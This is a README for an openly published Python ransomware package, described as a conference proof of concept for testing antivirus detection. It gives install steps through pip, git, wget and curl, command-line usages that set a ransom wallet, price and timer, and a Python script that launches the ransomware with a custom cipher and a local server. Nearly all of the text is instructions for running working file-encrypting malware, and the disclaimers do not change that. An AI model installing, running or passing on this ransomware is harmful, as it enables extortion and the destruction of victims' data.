
RansomWare
Description
This package implements a cross platform RansomWare.
Don't use this ransomware POC for illegal purposes!
This project is developed to test and demonstrate the behavior of antivirus against unknown malware in the context of a specific cybersecurity conference.
This malware is basic, it doesn't try to bypass any antivirus, EPP or EDR protection.
It can't be used for red team or pentest as it will get stuck, so don't try or you'll waste your time.
Requirements
This package require:
- python3
- python3 Standard Library
Installation
Pip
python3 -m pip install RansomWare
Git
git clone "https://github.com/mauricelambert/RansomWare.git"
cd "RansomWare"
python3 -m pip install .
Wget
wget https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .
cURL
curl -O https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .
Usages
Command line
RansomWare
python3 -m RansomWare
python3 RansomWare.pyz
RansomWare.exe
RansomWare aaa
RansomWare -t 56 aaa
RansomWare -e 64 YWFh
RansomWare -w "3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG" aaa
RansomWare -c BitCoin aaa
RansomWare -p 0.01 aaa
Python script
from RansomWare import RansomWare
def get_IV(filename: str) -> bytes:
"""
This function return my weak custom IV.
"""
return filename.encode()
def crypt(key: bytes, data:bytes) -> bytes:
"""
This function encrypts data with key.
"""
return bytes([(car + key[i % len(key)]) % 256 for i, car in enumerate(data)])
RansomWare(
b"aaa",
url="http://127.0.0.1:8000/",
wallet="3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG",
crypto="BitCoin",
price="0.01",
interval_time=56,
encrypt=crypt,
get_iv=get_IV,
).start()
Links
Licence
Licensed under the GPL, version 3.